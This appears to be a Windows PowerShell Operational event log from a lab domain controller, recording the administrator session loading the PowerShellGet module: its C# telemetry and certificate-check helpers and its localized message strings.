06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467062
Keywords=None
Message=Started invocation of ScriptBlock ID: 833ce886-0bda-40cb-a1a0-6b86440eef1c
Runspace ID: ff8d1fcc-94d9-4078-8466-5208a6cb51d2
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467061
Keywords=None
Message=Completed invocation of ScriptBlock ID: b9f337ef-d9f1-4356-be2d-20b6c86eb6cc
Runspace ID: 316cdae6-6e3a-4b6b-a499-5ff1faba5770
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467060
Keywords=None
Message=Started invocation of ScriptBlock ID: b9f337ef-d9f1-4356-be2d-20b6c86eb6cc
Runspace ID: 316cdae6-6e3a-4b6b-a499-5ff1faba5770
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467059
Keywords=None
Message=Completed invocation of ScriptBlock ID: 833ce886-0bda-40cb-a1a0-6b86440eef1c
Runspace ID: 316cdae6-6e3a-4b6b-a499-5ff1faba5770
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467058
Keywords=None
Message=Started invocation of ScriptBlock ID: 833ce886-0bda-40cb-a1a0-6b86440eef1c
Runspace ID: 316cdae6-6e3a-4b6b-a499-5ff1faba5770
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467057
Keywords=None
Message=Completed invocation of ScriptBlock ID: 45379c41-a4a5-4f66-b608-7333082ce12f
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4103
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Executing Pipeline
OpCode=To be used when operation is just executing a method
RecordNumber=1467056
Keywords=None
Message=CommandInvocation(Add-Type): "Add-Type"
ParameterBinding(Add-Type): name="ReferencedAssemblies"; value="System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, ..."
ParameterBinding(Add-Type): name="TypeDefinition"; value="using System; 
using System.Net;
using System.Management.Automation;
using Microsoft.Win32.SafeHandles;
using System.Security.Cryptography;
using System.Runtime.InteropServices;
using System.Runtime.ConstrainedExecution;
using System.Runtime.Versioning;
using System.Security;

namespace Microsoft.PowerShell.Commands.PowerShellGet 
{ 
    public static class Telemetry  
    { 
        public static void TraceMessageArtifactsNotFound(string[] artifactsNotFound, string operationName) 
        { 
            Microsoft.PowerShell.Telemetry.Internal.TelemetryAPI.TraceMessage(operationName, new { ArtifactsNotFound = artifactsNotFound });
        }         
        
        public static void TraceMessageNonPSGalleryRegistration(string sourceLocationType, string sourceLocationHash, string installationPolicy, string packageManagementProvider, string publishLocationHash, string scriptSourceLocationHash, string scriptPublishLocationHash, string operationName) 
        { 
            Microsoft.PowerShell.Telemetry.Internal.TelemetryAPI.TraceMessage(operationName, new { SourceLocationType = sourceLocationType, SourceLocationHash = sourceLocationHash, InstallationPolicy = installationPolicy, PackageManagementProvider = packageManagementProvider, PublishLocationHash = publishLocationHash, ScriptSourceLocationHash = scriptSourceLocationHash, ScriptPublishLocationHash = scriptPublishLocationHash });
        }         
        
    }
    
    /// <summary>
    /// Used by Ping-Endpoint function to supply webproxy to HttpClient
    /// We cannot use System.Net.WebProxy because this is not available on CoreClr
    /// </summary>
    public class InternalWebProxy : IWebProxy
    {
        Uri _proxyUri;
        ICredentials _credentials;

        public InternalWebProxy(Uri uri, ICredentials credentials)
        {
            Credentials = credentials;
            _proxyUri = uri;
        }

        /// <summary>
        /// Credentials used by WebProxy
        /// </summary>
        public ICredentials Credentials
        {
            get
            {
                return _credentials;
            }
            set
            {
                _credentials = value;
            }
        }

        public Uri GetProxy(Uri destination)
        {
            return _proxyUri;
        }

        public bool IsBypassed(Uri host)
        {
            return false;
        }
    } 

    [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
    public struct CERT_CHAIN_POLICY_PARA {
        public CERT_CHAIN_POLICY_PARA(int size) {
            cbSize = (uint) size;
            dwFlags = 0;
            pvExtraPolicyPara = IntPtr.Zero;
        }
        public uint   cbSize;
        public uint   dwFlags;
        public IntPtr pvExtraPolicyPara; 
    }

    [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
    public struct CERT_CHAIN_POLICY_STATUS {
        public CERT_CHAIN_POLICY_STATUS(int size) {
            cbSize = (uint) size;
            dwError = 0;
            lChainIndex = IntPtr.Zero;
            lElementIndex = IntPtr.Zero;
            pvExtraPolicyStatus = IntPtr.Zero;
        }
        public uint   cbSize;
        public uint   dwError;
        public IntPtr lChainIndex;
        public IntPtr lElementIndex;
        public IntPtr pvExtraPolicyStatus; 
    }

    // Internal SafeHandleZeroOrMinusOneIsInvalid class to remove the dependency on .Net Framework 4.6.
    public abstract class InternalSafeHandleZeroOrMinusOneIsInvalid : SafeHandle
    {
        protected InternalSafeHandleZeroOrMinusOneIsInvalid(bool ownsHandle)
            : base(IntPtr.Zero, ownsHandle)
        {
        }

        public override bool IsInvalid
        {
            get
            {
                return handle == IntPtr.Zero || handle == new IntPtr(-1);
            }
        }
    }

    // Internal SafeX509ChainHandle class to remove the dependency on .Net Framework 4.6.
    [SecurityCritical]
    public sealed class InternalSafeX509ChainHandle : InternalSafeHandleZeroOrMinusOneIsInvalid { 
        private InternalSafeX509ChainHandle () : base(true) {}
 
        internal InternalSafeX509ChainHandle (IntPtr handle) : base (true) {
            SetHandle(handle); 
        }
  
        internal static InternalSafeX509ChainHandle InvalidHandle { 
            get { return new InternalSafeX509ChainHandle(IntPtr.Zero); }
        } 
 
        [SecurityCritical]
        override protected bool ReleaseHandle() 
        {
            CertFreeCertificateChain(handle);
            return true;
        } 

        [DllImport("Crypt32.dll", SetLastError=true)]

        [SuppressUnmanagedCodeSecurity,
         ResourceExposure(ResourceScope.None),
         ReliabilityContract(Consistency.WillNotCorruptState, Cer.Success)]
        
        private static extern void CertFreeCertificateChain(IntPtr handle); 
    }

    public class Win32Helpers
    {
        [DllImport("Crypt32.dll", CharSet=CharSet.Auto, SetLastError=true)]
        public extern static 
        bool CertVerifyCertificateChainPolicy(
            [In]     IntPtr                       pszPolicyOID,
            [In]     SafeX509ChainHandle  pChainContext,
            [In]     ref CERT_CHAIN_POLICY_PARA   pPolicyPara,
            [In,Out] ref CERT_CHAIN_POLICY_STATUS pPolicyStatus);

        [DllImport("Crypt32.dll", CharSet=CharSet.Auto, SetLastError=true)]
        public static extern
        SafeX509ChainHandle CertDuplicateCertificateChain(
            [In]     IntPtr pChainContext);

        [DllImport("Crypt32.dll", CharSet=CharSet.Auto, SetLastError=true)]
    
        [ResourceExposure(ResourceScope.None)]
    
        public static extern
        SafeX509ChainHandle CertDuplicateCertificateChain(
            [In]     SafeX509ChainHandle pChainContext);

        public static bool IsMicrosoftCertificate([In] SafeX509ChainHandle pChainContext)
        {
            //-------------------------------------------------------------------------
            //  CERT_CHAIN_POLICY_MICROSOFT_ROOT  
            //  
            //  Checks if the last element of the first simple chain contains a  
            //  Microsoft root public key. If it doesn't contain a Microsoft root  
            //  public key, dwError is set to CERT_E_UNTRUSTEDROOT.  
            //  
            //  pPolicyPara is optional. However,  
            //  MICROSOFT_ROOT_CERT_CHAIN_POLICY_ENABLE_TEST_ROOT_FLAG can be set in  
            //  the dwFlags in pPolicyPara to also check for the Microsoft Test Roots.  
            //  
            //  MICROSOFT_ROOT_CERT_CHAIN_POLICY_CHECK_APPLICATION_ROOT_FLAG can be set  
            //  in the dwFlags in pPolicyPara to check for the Microsoft root for  
            //  application signing instead of the Microsoft product root. This flag  
            //  explicitly checks for the application root only and cannot be combined  
            //  with the test root flag.    
            //  
            //  MICROSOFT_ROOT_CERT_CHAIN_POLICY_DISABLE_FLIGHT_ROOT_FLAG can be set  
            //  in the dwFlags in pPolicyPara to always disable the Flight root.  
            //  
            //  pvExtraPolicyPara and pvExtraPolicyStatus aren't used and must be set  
            //  to NULL.  
            //--------------------------------------------------------------------------  
            const uint MICROSOFT_ROOT_CERT_CHAIN_POLICY_ENABLE_TEST_ROOT_FLAG       = 0x00010000;
            const uint MICROSOFT_ROOT_CERT_CHAIN_POLICY_CHECK_APPLICATION_ROOT_FLAG = 0x00020000;
            //const uint MICROSOFT_ROOT_CERT_CHAIN_POLICY_DISABLE_FLIGHT_ROOT_FLAG    = 0x00040000;

            CERT_CHAIN_POLICY_PARA PolicyPara = new CERT_CHAIN_POLICY_PARA(Marshal.SizeOf(typeof(CERT_CHAIN_POLICY_PARA)));
            CERT_CHAIN_POLICY_STATUS PolicyStatus = new CERT_CHAIN_POLICY_STATUS(Marshal.SizeOf(typeof(CERT_CHAIN_POLICY_STATUS)));
            int CERT_CHAIN_POLICY_MICROSOFT_ROOT = 7;
            
            PolicyPara.dwFlags = (uint) MICROSOFT_ROOT_CERT_CHAIN_POLICY_ENABLE_TEST_ROOT_FLAG;
            bool isMicrosoftRoot = false;

            if(CertVerifyCertificateChainPolicy(new IntPtr(CERT_CHAIN_POLICY_MICROSOFT_ROOT),
                                                pChainContext,
                                                ref PolicyPara,
                                                ref PolicyStatus))
            {
                isMicrosoftRoot = (PolicyStatus.dwError == 0);
            }

            // Also check for the Microsoft root for application signing if the Microsoft product root verification is unsuccessful.
            if(!isMicrosoftRoot)
            {
                // Some Microsoft modules can be signed with Microsoft Application Root instead of Microsoft Product Root,
                // So we need to use the MICROSOFT_ROOT_CERT_CHAIN_POLICY_CHECK_APPLICATION_ROOT_FLAG for the certificate verification.
                // MICROSOFT_ROOT_CERT_CHAIN_POLICY_CHECK_APPLICATION_ROOT_FLAG can not be used
                // with MICROSOFT_ROOT_CERT_CHAIN_POLICY_ENABLE_TEST_ROOT_FLAG,
                // so additional CertVerifyCertificateChainPolicy call is required to verify the given certificate is in Microsoft Application Root.
                //
                CERT_CHAIN_POLICY_PARA PolicyPara2 = new CERT_CHAIN_POLICY_PARA(Marshal.SizeOf(typeof(CERT_CHAIN_POLICY_PARA)));
                CERT_CHAIN_POLICY_STATUS PolicyStatus2 = new CERT_CHAIN_POLICY_STATUS(Marshal.SizeOf(typeof(CERT_CHAIN_POLICY_STATUS)));
                PolicyPara2.dwFlags = (uint) MICROSOFT_ROOT_CERT_CHAIN_POLICY_CHECK_APPLICATION_ROOT_FLAG;

                if(CertVerifyCertificateChainPolicy(new IntPtr(CERT_CHAIN_POLICY_MICROSOFT_ROOT),
                                                    pChainContext,
                                                    ref PolicyPara2,
                                                    ref PolicyStatus2))
                {
                    isMicrosoftRoot = (PolicyStatus2.dwError == 0);
                }
            }

            return isMicrosoftRoot;
        }
    }
} "
ParameterBinding(Add-Type): name="Language"; value="CSharp"
ParameterBinding(Add-Type): name="ErrorAction"; value="SilentlyContinue"


Context:
        Severity = Informational
        Host Name = ConsoleHost
        Host Version = 5.1.14393.4402
        Host ID = b0030b64-c114-4765-a95a-dacf53f2747d
        Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Engine Version = 5.1.14393.4402
        Runspace ID = c5f1100c-56fc-4347-871f-80d397213539
        Pipeline ID = 9
        Command Name = Add-Type
        Command Type = Cmdlet
        Script Name = C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1
        Command Path = 
        Sequence Number = 20
        User = ATTACKRANGE\administrator
        Connected User = 
        Shell ID = Microsoft.PowerShell


User Data:
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467055
Keywords=None
Message=Completed invocation of ScriptBlock ID: b5078b5d-8a41-45b2-a7d5-f3637cd1accb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467054
Keywords=None
Message=Started invocation of ScriptBlock ID: b5078b5d-8a41-45b2-a7d5-f3637cd1accb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467053
Keywords=None
Message=Creating Scriptblock text (3 of 3):
id. Verify that the manifest file is valid, and then try again.'{1}'
ExportedDscResourcesNotSupportedOnLowerPowerShellVersion=The ExportedDscResources property is not supported in module manifests on PowerShell versions that are older than 5.0. Remove the value for the parameter ‘DscResourcesToExport’, and then try again.
CompatiblePSEditionsNotSupportedOnLowerPowerShellVersion=The CompatiblePSEditions property is not supported in module manifests on PowerShell versions that are older than 5.1. Remove the value for the parameter ‘CompatiblePSEditions’, and then try again.
ExternalModuleDependenciesNotSpecifiedInRequiredOrNestedModules='{0}' is listed in ExternalModuleDependencies, but it is not found in either the RequiredModules or NestedModules properties. Verify that this module is required for ExternalModuleDependencies, and then add it to NestedModules or RequiredModules.
TestModuleManifestFail=Cannot update the manifest properly. '{0}'
PackageManagementProvidersNotInModuleBaseFolder=PackageManagementProvider '{0}' is not found in the module base '{1}'. Verify that the PackageManagementProvider specified is within the module base.
UpdateManifestContentMessage=Update manifest file with new contents:
InvalidPackageManagementProviderValue=The PackageManagementProvider value cannot be '{0}'. Valid values for provider names include '{1}', and the default value for this parameter is '{2}'.
PowerShellGetUpdateIsNotSupportedOnLowerPSVersions=Self update of the PowerShellGet module is supported only in PowerShell 5.0 and newer releases. It is not supported in PowerShell 3.0 or 4.0.
ScriptVersionShouldBeGreaterThanGalleryVersion=Script '{0}' with version '{1}' cannot be published. The version must exceed the current version '{2}' that exists in the repository '{3}', or you must specify -Force.
ScriptVersionIsAlreadyAvailableInTheGallery=The script '{0}' with version '{1}' cannot be published as the current version '{2}' is already available in the repository '{3}'.
ScriptParseError=The specified script file '{0}' has parse errors, try again after fixing the parse errors.
InvalidScriptToPublish=Script file '{0}' cannot be published because it does not have the required script metadata. Run Update-ScriptFileInfo -Path '{1}' to add the script metadata.
FailedToCreateCompressedScript=Failed to generate the compressed file for script '{0}'.
FailedToPublishScript=Failed to publish script '{0}': '{1}'.
PublishedScriptSuccessfully=Successfully published script '{0}' to the publish location '{1}'. Please allow few minutes for '{2}' to show up in the search results.
UnableToResolveScriptDependency=PowerShellGet cannot resolve the {0} dependency '{1}' of the script '{2}' on the repository '{3}'. Verify that the dependent {0} '{1}' is available in the repository '{3}'. If this dependent {0} '{1}' is managed externally, add it to the '{4}' entry in the script metadata.
InvalidVersion=Cannot convert value '{0}' to type 'System.Version'.
InvalidGuid=Cannot convert value '{0}' to type 'System.Guid'.
InvalidParameterValue=The specified value '{0}' for the parameter '{1}' is invalid. Ensure that it does not contain '<#' or '#>'.
MissingPSScriptInfo=PSScriptInfo is not specified in the script file '{0}'. You can use the Update-ScriptFileInfo with -Force or New-ScriptFileInfo cmdlet to add the PSScriptInfo to the script file.
MissingRequiredPSScriptInfoProperties=Script '{0}' is missing required metadata properties. Verify that the script file has Version, Guid, Description and Author properties. You can use the Update-ScriptFileInfo or New-ScriptFileInfo cmdlet to add or update the PSScriptInfo to the script file.
SkippedScriptDependency=Because dependent script '{0}' was skipped in the script dependencies list, users might not know how to install it.
SourceLocationPathsForModulesAndScriptsShouldBeEqual=SourceLocation '{0}' and ScriptSourceLocation '{1}' should be same for SMB Share or Local directory based repositories.
SourceLocationUrisForModulesAndScriptsShouldBeDifferent=SourceLocation '{0}' and ScriptSourceLocation '{1}' should not be same for URI based repositories.
PublishLocationPathsForModulesAndScriptsShouldBeEqual=PublishLocation '{0}' and ScriptPublishLocation '{1}' should be same for SMB Share or Local directory based repositories.
SpecifiedNameIsAlearyUsed=The specified name '{0}' is already used for a different item on the specified repository '{1}'. Run '{2} -Name {0} -Repository {1}' to check whether the specified name '{0}' is already taken.
InvalidScriptFilePath=The script file path '{0}' is not valid. The value of the Path argument must resolve to a single file that has a '.ps1' extension. Change the value of the Path argument to point to a valid ps1 file, and then try again.
NuGetApiKeyIsRequiredForNuGetBasedGalleryService=NuGetApiKey is required for publishing a module or script file to the specified repository '{0}' whose publish location is '{1}'. Try again after specifying a valid value for the NuGetApiKey parameter. To get your API key, view your profile page.
ScriptFileExist=The specified script file '{0}' already exists.
PublishPSArtifactUnsupportedOnNano=Publish-{0} is not supported on Nano Server.
InvalidEnvironmentVariableName=The specified environment variable name '{0}' exceeded the allowed limit of '{1}' characters.
PublishLocation=Publish Location:'{0}'.
ScriptPATHPromptCaption=PATH Environment Variable Change
ScriptPATHPromptQuery=Your system has not been configured with a default script installation path yet, which means you can only run a script by specifying the full path to the script file. This action places the script into the folder '{0}', and adds that folder to your PATH environment variable. Do you want to add the script installation path '{0}' to the PATH environment variable?
AddedScopePathToProcessSpecificPATHVariable=Added scripts installation location '{0}' for '{1}' scope to process specific PATH environment varaible.
AddedScopePathToPATHVariable=Added scripts installation location '{0}' for '{1}' scope to PATH environment varaible.
FilePathInFileListNotWithinModuleBase=Path '{0}' defined in FileList is not within module base '{1}'. Provide the correct FileList parameters and then try again.
ManifestFileReadWritePermissionDenied=The current user does not have read-write permissions for the file:'{0}'. Check the file permissions and then try again.
MissingTheRequiredPathOrPassThruParameter=The Path or PassThru parameter is required for creating the script file info. A new script file will be created with the script file info when the Path parameter is specified. Script file info will be returned if the PassThru parameter is specified. Try again after specifying the required parameter.
DescriptionParameterIsMissingForAddingTheScriptFileInfo=Description parameter is missing for adding the metadata to the script file. Try again after specifying the description.
UnableToAddPSScriptInfo=Unable to add PSScriptInfo to the script file '{0}'. You can use the New-ScriptFileInfo cmdlet to add the metadata to the existing script file.
RegisterVSTSFeedAsNuGetPackageSource=Publishing to a VSTS package management feed '{0}' requires it to be registered as a NuGet package source. Retry after adding this source '{0}' as NuGet package source by following the instructions specified at '{1}'
InvalidModuleAuthenticodeSignature=The module '{0}' cannot be installed or updated because the authenticode signature of the file '{1}' is not valid.
InvalidCatalogSignature=The module '{0}' cannot be installed because the catalog signature in '{1}' does not match the hash generated from the module.
AuthenticodeIssuerMismatch=Authenticode issuer '{0}' of the new module '{1}' with version '{2}' is not matching with the authenticode issuer '{3}' of the previously-installed module '{4}' with version '{5}'. If you still want to install or update, use -SkipPublisherCheck parameter.
ModuleCommandAlreadyAvailable=A command with name '{0}' is already available on this system. This module '{1}' may override the existing commands. If you still want to install this module '{1}', use -AllowClobber parameter.
CatalogFileFound=Found the catalog file '{0}' in the module '{1}' contents.
CatalogFileNotFoundInAvailableModule=Catalog file '{0}' is not found in the contents of the previously-installed module '{1}' with the same name.
CatalogFileNotFoundInNewModule=Catalog file '{0}' is not found in the contents of the module '{1}' being installed.
ValidAuthenticodeSignature=Valid authenticode signature found in the catalog file '{0}' for the module '{1}'.
ValidAuthenticodeSignatureInFile=Valid authenticode signature found in the file '{0}' for the module '{1}'.
ValidatingCatalogSignature=Validating the '{0}' module files for catalog signing using the catalog file '{1}'.
AuthenticodeIssuerMatch=Authenticode issuer '{0}' of the new module '{1}' with version '{2}' matches with the authenticode issuer '{3}' of the previously-installed module '{4}' with version '{5}'.
ValidCatalogSignature=The catalog signature in '{0}' of the module '{1}' is valid and matches with the hash generated from the module contents.
SkippingPublisherCheck=Skipping the Publisher check for the version '{0}' of module '{1}'.
SourceModuleDetailsForPublisherValidation=For publisher validation, using the previously-installed module '{0}' with version '{1}' under '{2}' with publisher name '{3}'. Is this module signed by Microsoft: '{4}'.
NewModuleVersionDetailsForPublisherValidation=For publisher validation, current module '{0}' with version '{1}' with publisher name '{2}'. Is this module signed by Microsoft: '{3}'.
PublishersMatch=Publisher '{0}' of the new module '{1}' with version '{2}' matches with the publisher '{3}' of the previously-installed module '{4}' with version '{5}'. Both versions are signed with a Microsoft root certifacte.
PublishersMismatch=A Microsoft-signed module named '{0}' with version '{1}' that was previously installed conflicts with the new module '{2}' from publisher '{3}' with version '{4}'. Installing the new module may result in system instability. If you still want to install or update, use -SkipPublisherCheck parameter.
ModuleIsNotCatalogSigned=The version '{0}' of the module '{1}' being installed is not catalog signed. Ensure that the version '{0}' of the module '{1}' has the catalog file '{2}' and signed with the same publisher '{3}' as the previously-installed module '{0}' with version '{4}' under the directory '{5}'. If you still want to install or update, use -SkipPublisherCheck parameter.
###PSLOC
'@



ScriptBlock ID: b5078b5d-8a41-45b2-a7d5-f3637cd1accb
Path:
06/15/2021 04:59:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1467052
Keywords=None
Message=Creating Scriptblock text (2 of 3):
 registered repository name. Please ensure that '{1}' is a registered repository.
RepositoryRegistered=Successfully registered the repository '{0}' with source location '{1}'.
RepositoryUnregistered=Successfully unregistered the repository '{0}'.
PSGalleryPublishLocationIsMissing=The specified repository '{0}' does not have a valid PublishLocation. Retry after setting the PublishLocation for repository '{1}' to a valid NuGet publishing endpoint using the Set-PSRepository cmdlet.
PSRepositoryScriptPublishLocationIsMissing=The specified repository '{0}' does not have a valid ScriptPublishLocation. Retry after setting the ScriptPublishLocation for repository '{1}' to a valid NuGet publishing endpoint using the Set-PSRepository cmdlet.
ScriptSourceLocationIsMissing=The specified repository '{0}' does not have a valid ScriptSourceLocation. Retry after setting the ScriptSourceLocation for repository '{0}' to a valid NuGet endpoint for scripts using the Set-PSRepository cmdlet.
PublishModuleSupportsOnlyNuGetBasedPublishLocations=Publish-Module only supports the NuGet-based publish locations. The PublishLocation '{0}' of the repository '{1}' is not a NuGet-based publish location. Retry after setting the PublishLocation for repository '{1}' to a valid NuGet publishing endpoint using the Set-PSRepository cmdlet.
PublishScriptSupportsOnlyNuGetBasedPublishLocations=Publish-Script only supports the NuGet-based publish locations. The ScriptPublishLocation '{0}' of the repository '{1}' is not a NuGet-based publish location. Retry after setting the ScriptPublishLocation for repository '{1}' to a valid NuGet publishing endpoint using the Set-PSRepository cmdlet.
DynamicParameterHelpMessage=The dynamic parameter '{0}' is required for Find-Module and Install-Module when using the PackageManagement provider '{1}' and source location '{2}'. Please enter your value for the '{3}' dynamic parameter:
ProviderApiDebugMessage=In PowerShellGet Provider - '{0}'.
ModuleUninstallNotSupported=Module uninstallation is not supported. To remove a module, please delete the module folder.
FastPackageReference=The FastPackageReference is '{0}'.
PackageManagementProviderIsNotAvailable=The specified PackageManagement provider '{0}' is not available.
SpecifiedSourceName=Using the specified source names : '{0}'.
SpecifiedLocationAndOGP=The specified Location is '{0}' and PackageManagementProvider is '{1}'.
NoSourceNameIsSpecified=The -Repository parameter was not specified.  PowerShellGet will use all of the registered repositories.
GettingPackageManagementProviderObject=Getting the provider object for the PackageManagement Provider '{0}'.
InvalidInputObjectValue=Invalid value is specified for InputObject parameter.
SpecifiedInstallationScope=The installation scope is specified to be '{0}'.
SourceLocationValueForPSGalleryCannotBeChanged=The SourceLocation value for the PSGallery repository can not be changed.
PublishLocationValueForPSGalleryCannotBeChanged=The PublishLocation value for the PSGallery repository can not be changed.
SpecifiedProviderName=The specified PackageManagement provider name '{0}'.
ProviderNameNotSpecified=User did not specify the PackageManagement provider name, trying with the provider name '{0}'.
SpecifiedProviderNotAvailable=The specified PackageManagement provider '{0}' is not available.
SpecifiedProviderDoesnotSupportPSModules=The specified PackageManagement Provider '{0}' does not support PowerShell Modules. PackageManagement Providers must support the 'supports-powershell-modules' feature.
PollingPackageManagementProvidersForLocation=Polling available PackageManagement Providers to find one that can support the specified source location '{0}'.
PollingSingleProviderForLocation=Resolving the source location '{0}' with PackageManagement Provider '{1}'.
FoundProviderForLocation=The PackageManagement provider '{0}' supports the source location '{1}'.
SpecifiedLocationCannotBeRegistered=The specified location '{0}' cannot be registered.
RepositoryDetails=Repository details, Name = '{0}', Location = '{1}'; IsTrusted = '{2}'; IsRegistered = '{3}'.
NotSupportedPowerShellGetFormatVersion=The specified module '{0}' with PowerShellGetFormatVersion '{1}' is not supported by the current version of PowerShellGet. Get the latest version of the PowerShellGet module to install this module, '{2}'.
NotSupportedPowerShellGetFormatVersionScripts=The specified script '{0}' with PowerShellGetFormatVersion '{1}' is not supported by the current version of PowerShellGet. Get the latest version of the PowerShellGet module to install this script, '{2}'.
PathNotFound=Cannot find the path '{0}' because it does not exist.
ModuleIsNotTrusted=Untrusted module '{0}'.
ScriptIsNotTrusted=Untrusted script '{0}'.
SkippedModuleDependency=Because dependent module '{0}' was skipped in the module dependencies list, users might not know how to install it.
MissingExternallyManagedModuleDependency=The externally managed, dependent module '{0}' is not installed on this computer. To use the current module '{1}', ensure that its dependent module '{2}' is installed.
ExternallyManagedModuleDependencyIsInstalled=The externally managed, dependent module '{0}' is already installed on this computer.
ScriptMissingExternallyManagedModuleDependency=The externally managed, dependent module '{0}' is not installed on this computer. To use the current script '{1}', ensure that its dependent module '{2}' is installed.
ScriptMissingExternallyManagedScriptDependency=The externally managed, dependent module '{0}' is not installed on this computer. To use the current script '{1}', ensure that its dependent script '{2}' is installed.
ScriptExternallyManagedScriptDependencyIsInstalled=The externally managed, dependent script '{0}' is already installed on this computer.
UnableToResolveModuleDependency=PowerShellGet cannot resolve the module dependency '{0}' of the module '{1}' on the repository '{2}'. Verify that the dependent module '{3}' is available in the repository '{4}'. If this dependent module '{5}' is managed externally, add it to the ExternalModuleDependencies entry in the PSData section of the module manifest.
FindingModuleDependencies=Finding module dependencies for version '{1}' of the module '{0}' from repository '{2}'.
InstallingDependencyModule=Installing the dependency module '{0}' with version '{1}' for the module '{2}'.
InstallingDependencyScript=Installing the dependency script '{0}' with version '{1}' for the script '{2}'.
SavingDependencyModule=Saving the dependency module '{0}' with version '{1}' for the module '{2}'.
SavingDependencyScript=Saving the dependency script '{0}' with version '{1}' for the script '{2}'.
ModuleUninstallationSucceeded=Successfully uninstalled the module '{0}' from module base '{1}'.
ScriptUninstallationSucceeded=Successfully uninstalled the script '{0}' from script base '{1}'.
AdminPrivilegesRequiredForUninstall=You cannot uninstall the module '{0}' from '{1}' because Administrator rights are required to uninstall from that folder. Log on to the computer with an account that has Administrator rights, and then try again. You can also try running the Windows PowerShell session with elevated rights (Run as Administrator).
AdminPrivilegesRequiredForScriptUninstall=You cannot uninstall the script '{0}' from '{1}' because Administrator rights are required to uninstall from that folder. Log on to the computer with an account that has Administrator rights, and then try again. You can also try running the Windows PowerShell session with elevated rights (Run as Administrator).
ModuleUninstallationNotPossibleAsItIsNotInstalledUsingPowerShellGet=Module '{0}' was not installed on this computer by using either the PowerShellGet cmdlets or the PowerShellGet provider, so it cannot be uninstalled.
ScriptUninstallationNotPossibleAsItIsNotInstalledUsingPowerShellGet=Script '{0}' was not installed on this computer by using either the PowerShellGet cmdlets or the PowerShellGet provider, so it cannot be uninstalled.
